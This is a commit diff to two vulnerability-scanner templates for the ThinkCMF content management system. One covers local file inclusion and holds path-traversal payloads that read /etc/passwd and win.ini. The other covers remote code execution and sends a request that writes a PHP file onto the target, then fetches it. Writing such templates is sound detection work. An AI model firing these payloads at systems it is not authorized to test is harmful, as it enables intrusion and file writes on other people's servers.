Added more unique matchers

vulnerabilities/thinkcmf/thinkcmf-lfi.yaml

@@ -6,20 +6,24 @@ info:
   severity: high
   reference: https://www.freebuf.com/vuls/217586.html
   tags: thinkcmf,lfi
+  metadata:
+    win-payload: "../../../../../../../../../../../../../../../../windows/win.ini"
+    unix-payload: "../../../../../../../../../../../../../../../../etc/passwd"
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../etc/passwd"
-      - "{{BaseURL}}/?a=display&templateFile=../../../../../../../../../../../../../../../../windows/win.ini"
+      - "{{BaseURL}}/?a=display&templateFile=README.md"
 
     matchers-condition: and
     matchers:
 
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-          - "bit app support"
+      - type: word
+        condition: and
+        words:
+          - "ThinkCMF"
+          - "## README"
+          - "## UPDATE"
 
       - type: status
         status:

vulnerabilities/thinkcmf/thinkcmf-rce.yaml

@@ -8,21 +8,20 @@ info:
   tags: thinkcmf,rce
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B"
-  - method: GET
-    path:
-      - "{{BaseURL}}/poc.php"
+  - raw:
+      - |
+        GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo phpinfo();\");')}} HTTP/1.1
+        Host: {{Hostname}}
 
-    matchers-condition: and
+      - |
+        GET /{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
     matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "PHP Extension")'
+          - 'contains(body_2, "PHP Version")'
+          - 'status_code_2 == 200'
+        condition: and